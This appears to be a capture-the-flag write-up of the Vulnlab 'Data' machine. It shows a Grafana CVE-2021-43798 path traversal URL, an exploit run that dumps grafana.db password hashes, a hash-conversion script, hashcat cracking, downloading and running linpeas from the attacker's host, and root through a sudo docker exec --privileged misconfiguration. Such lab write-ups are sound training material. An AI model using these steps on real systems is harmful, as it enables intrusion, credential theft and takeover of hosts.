Vulnlab - Data

Vulnlab – Data

In this walk through, we will be going through the Data room from Vulnlab. This room is rated as Easy on the platform and it consist of dumping of grafana DB using CVE-2021-43798 which reveals the hash password of user boris that have to crack using hashcat to get initial access on the target. For Privilege Escalation, abuse of docker binary sudo misconfiguration is required to get root. So, let’s get started without any delay.

Data

Machine Info:

TitleData
IPaddress10.10.110.156
DifficultyEasy
OSLinux
DescriptionData is an Easy Linux machine that requires dumping of grafana DB using CVE-2021-43798 which reveals the hash password of user boris that have to crack using hashcat to get initial access on the target. For Privilege Escalation, abuse of docker binary sudo misconfiguration is required to get root.

Enumeration:

  • I started off with a regular nmap scan along with all TCP port scan and UDP scan. Found only 2 ports opened – 22 (SSH) and 3000 (PPP).

$ sudo nmap -sV -sC 10.10.110.156
[sudo] password for wh1terose: 
Starting Nmap 7.80 ( https://nmap.org ) at 2024-04-18 21:46 IST

Not shown: 997 closed ports
PORT     STATE    SERVICE VERSION
22/tcp   open     ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 69:11:30:a1:f4:57:9b:c7:5d:e6:a6:d8:4f:34:d0:c7 (RSA)
|   256 62:ee:64:8c:56:57:5e:0c:21:f3:7a:45:49:c9:2d:ed (ECDSA)
|_  256 2e:8b:33:0b:c2:a6:37:5a:d5:34:11:47:1d:3c:48:3c (ED25519)
53/tcp   filtered domain
3000/tcp open     ppp?
| fingerprint-strings: 
|   FourOhFourRequest: 
|     HTTP/1.0 302 Found
|     Cache-Control: no-cache
|     Content-Type: text/html; charset=utf-8
|     Expires: -1
|     Location: /login
|     Pragma: no-cache
|     Set-Cookie: redirect_to=%2Fnice%2520ports%252C%2FTri%256Eity.txt%252ebak; Path=/; HttpOnly; SameSite=Lax
|     X-Content-Type-Options: nosniff
|     X-Frame-Options: deny
|     X-Xss-Protection: 1; mode=block
|     Date: Thu, 18 Apr 2024 16:17:35 GMT
|     Content-Length: 29
|     href="/login">Found</a>.
|   GenericLines, Help, Kerberos, RTSPRequest, SSLSessionReq, TLSSessionReq, TerminalServerCookie: 
|     HTTP/1.1 400 Bad Request
|     Content-Type: text/plain; charset=utf-8
|     Connection: close
|     Request
|   GetRequest: 
|     HTTP/1.0 302 Found
|     Cache-Control: no-cache
|     Content-Type: text/html; charset=utf-8
|     Expires: -1
|     Location: /login
|     Pragma: no-cache
|     Set-Cookie: redirect_to=%2F; Path=/; HttpOnly; SameSite=Lax
|     X-Content-Type-Options: nosniff
|     X-Frame-Options: deny
|     X-Xss-Protection: 1; mode=block
|     Date: Thu, 18 Apr 2024 16:17:00 GMT
|     Content-Length: 29
|     href="/login">Found</a>.
|   HTTPOptions: 
|     HTTP/1.0 302 Found
|     Cache-Control: no-cache
|     Expires: -1
|     Location: /login
|     Pragma: no-cache
|     Set-Cookie: redirect_to=%2F; Path=/; HttpOnly; SameSite=Lax
|     X-Content-Type-Options: nosniff
|     X-Frame-Options: deny
|     X-Xss-Protection: 1; mode=block
|     Date: Thu, 18 Apr 2024 16:17:06 GMT
|_    Content-Length: 0
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port3000-TCP:V=7.80%I=7%D=4/18%Time=6621477C%P=x86_64-pc-linux-gnu%r(Ge
SF:nericLines,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20t
SF:ext/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x
SF:20Request")%r(GetRequest,174,"HTTP/1\.0\x20302\x20Found\r\nCache-Contro
SF:l:\x20no-cache\r\nContent-Type:\x20text/html;\x20charset=utf-8\r\nExpir
SF:es:\x20-1\r\nLocation:\x20/login\r\nPragma:\x20no-cache\r\nSet-Cookie:\
SF:x20redirect_to=%2F;\x20Path=/;\x20HttpOnly;\x20SameSite=Lax\r\nX-Conten
SF:t-Type-Options:\x20nosniff\r\nX-Frame-Options:\x20deny\r\nX-Xss-Protect
SF:ion:\x201;\x20mode=block\r\nDate:\x20Thu,\x2018\x20Apr\x202024\x2016:17
SF::00\x20GMT\r\nContent-Length:\x2029\r\n\r\n<a\x20href=\"/login\">Found<
SF:/a>\.\n\n")%r(Help,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Ty
SF:pe:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\
SF:x20Bad\x20Request")%r(HTTPOptions,12E,"HTTP/1\.0\x20302\x20Found\r\nCac
SF:he-Control:\x20no-cache\r\nExpires:\x20-1\r\nLocation:\x20/login\r\nPra
SF:gma:\x20no-cache\r\nSet-Cookie:\x20redirect_to=%2F;\x20Path=/;\x20HttpO
SF:nly;\x20SameSite=Lax\r\nX-Content-Type-Options:\x20nosniff\r\nX-Frame-O
SF:ptions:\x20deny\r\nX-Xss-Protection:\x201;\x20mode=block\r\nDate:\x20Th
SF:u,\x2018\x20Apr\x202024\x2016:17:06\x20GMT\r\nContent-Length:\x200\r\n\
SF:r\n")%r(RTSPRequest,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-T
SF:ype:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400
SF:\x20Bad\x20Request")%r(SSLSessionReq,67,"HTTP/1\.1\x20400\x20Bad\x20Req
SF:uest\r\nContent-Type:\x20text/plain;\x20charset=utf-8\r\nConnection:\x2
SF:0close\r\n\r\n400\x20Bad\x20Request")%r(TerminalServerCookie,67,"HTTP/1
SF:\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20text/plain;\x20charset
SF:=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x20Request")%r(TLSSess
SF:ionReq,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20text/
SF:plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x20Re
SF:quest")%r(Kerberos,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Ty
SF:pe:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\
SF:x20Bad\x20Request")%r(FourOhFourRequest,1A1,"HTTP/1\.0\x20302\x20Found\
SF:r\nCache-Control:\x20no-cache\r\nContent-Type:\x20text/html;\x20charset
SF:=utf-8\r\nExpires:\x20-1\r\nLocation:\x20/login\r\nPragma:\x20no-cache\
SF:r\nSet-Cookie:\x20redirect_to=%2Fnice%2520ports%252C%2FTri%256Eity\.txt
SF:%252ebak;\x20Path=/;\x20HttpOnly;\x20SameSite=Lax\r\nX-Content-Type-Opt
SF:ions:\x20nosniff\r\nX-Frame-Options:\x20deny\r\nX-Xss-Protection:\x201;
SF:\x20mode=block\r\nDate:\x20Thu,\x2018\x20Apr\x202024\x2016:17:35\x20GMT
SF:\r\nContent-Length:\x2029\r\n\r\n<a\x20href=\"/login\">Found</a>\.\n\n"
SF:);
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 112.91 seconds

sudo nmap -p- -T4 10.10.110.156

PORT     STATE    SERVICE
22/tcp   open     ssh
53/tcp   filtered domain
3000/tcp open     ppp

sudo nmap -sU 10.10.110.156

PORT   STATE         SERVICE
53/udp open|filtered domain
68/udp open|filtered dhcpc

PORT 3000 (Grafana)

  • Found a Grafana Login panel on port 3000. Tried default and common creds on it but it didn’t worked.

Grafana Login panel

  • At the bottom of the page, found the version number of the running application.

Found the version number

Exploitation:

  • Looked online and any known exploit and found that the version is potentially vulnerable to CVE-2021-43798 which is a directory traversal and Arbitrary File Read exploit.

Exploithttps://github.com/pedrohavay/exploit-grafana-CVE-2021-43798

  • Using the found exploit got the secret_key from the Grafana.ini file.

# Download and Setup the exploit

git clone https://github.com/pedrohavay/exploit-grafana-CVE-2021-43798.git

cd exploit-grafana-CVE-2021-43798/

pip3 install -r requirements.txt

# Saved the target URL in targets.txt file and fire the exploit.

python3 exploit.py

python3 exploit.py

  • The exploit has also dumped the Grafana Database file. Upon peeking into it, found a potential password of user borris.

# Interact with the database

sqlite3 grafana.db

.tables

# Dump data from user table.

select * from user;

1|0|admin|admin@localhost||7a919e4bbe95cf5104edf354ee2e6234efac1ca1f81426844a24c4df6131322cf3723c92164b6172e9e73faf7a4c2072f8f8|YObSoLj55S|hLLY6QQ4Y6||1|1|0||2022-01-23 12:48:04|2022-01-23 12:48:50|0|2022-01-23 12:48:50|0


2|0|boris|[email protected]|boris|dc6becccbb57d34daf4a4e391d2015d3350c60df3608e9e99b5291e47f3e5cd39d156be220745be3cbe49353e35f53b51da8|LCBhdtJWjl|mYl941ma8w||1|0|0||2022-01-23 12:49:11|2022-01-23 12:49:11|0|2012-01-23 12:49:11|0

sqlite3 grafana.db

  • As per the below blog post and the grafana encryption implementation on github, Grafana uses PBKDF2-HMAC-SHA256 which is crackable via hashcat with mode – 10900.

Resource 1: https://vulncheck.com/blog/grafana-cve-2021-43798

Resource 2: https://github.com/grafana/grafana/blob/main/pkg/util/encryption.go#L145

# Snipped from the encryption.go file on grafana github repo

// Key needs to be 32bytes
func encryptionKeyToBytes(secret, salt string) ([]byte, error) {
	return pbkdf2.Key([]byte(secret), []byte(salt), 10000, 32, sha256.New), nil
}

hashcat -h | grep 10900

  • But fist we have to convert the captured hashes to hashcat compatible format with the help of the below script written in Golang.

package main

import (
    b64 "encoding/base64"
    hex "encoding/hex"
    "fmt"
)

func main() {

    var password  = "dc6becccbb57d34daf4a4e391d2015d3350c60df3608e9e99b5291e47f3e5cd39d156be220745be3cbe49353e35f53b51da8"
    var salt  = "LCBhdtJWjl"

    decoded_hash, _ := hex.DecodeString(password)
    hash64 := b64.StdEncoding.EncodeToString([]byte(decoded_hash))
    salt64 := b64.StdEncoding.EncodeToString([]byte(salt))
    fmt.Println("sha256:10000:" + salt64 + ":" + hash64 + "\n")
}

go run script.go

sha256:10000:TENCaGR0SldqbA==:3GvszLtX002vSk45HSAV0zUMYN82COnpm1KR5H8+XNOdFWviIHRb48vkk1PjX1O1Hag=

  • Cracked the boris hash with hashcat and got the password – beautiful1

hashcat -m 10900 hash /usr/share/wordlists/rockyou.txt -O

hash cracked

  • Got in as user boris via ssh and got the user flag.

user flag

Privilege Escalation:

  • Transferred Linpeas on the target host to enumerate some privilege escalation vectors.

# Running Python HTTP server on port 80 on attacker machine serving linpeas

python3 -m http.server 80

# Download and execute linpeas on the target

wget http://tun0-IP/linpeas.sh
chmod +x 
./linpeas.sh

  • As per the below output, we can run docker binary as root.

sudo -l

  • To abuse the above command. We first have to get the running container ID. For that, we can leverage the earlier grafana LFI vulnerability.

http://10.10.110.156:3000/public/plugins/alertlist/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc/hostname

e6ff5b1cbc85

  • Executed the below command and got root on the container. Here we are spawning a privileged interactive terminal shell using -it option followed by the container ID and our command “sh”.

sudo /snap/bin/docker exec --privileged -it -u root e6ff5b1cbc85 sh

got root

  • At last, we have to mount the host file system. Post that, we are able to capture our root flag.

mkdir -p /mnt/kakashi
mount /dev/xvda1 /mnt/kakashi
cd /mnt/kakashi/root
cat root.txt

root flag

Also Read: Vulnlab – Baby 2

Conclusion:

Conclusion

So that was “Data” for you. We started off with a regular nmap scan and found 2 ports opened – 22 (SSH) and 3000 (PPP). Enumerated the webserver on port 3000 and found Grafana CMS running with version 8.0.0. Looked online for any known exploit related to the concerned version and found out that it is vulnerable to CVE-2021-43798. Used the same to dump the grafana DB which revealed user boris hash password. Converted the hash to hashcat compatible format and cracked it to get initial access on the target using that. For Privilege Escalation, docker binary sudo misconfiguration was abused to get root. On that note, i would take your leave and will meet you in next one. Till then, “Happy hacking”.

Leave a Comment

Your email address will not be published. Required fields are marked *

Scroll to Top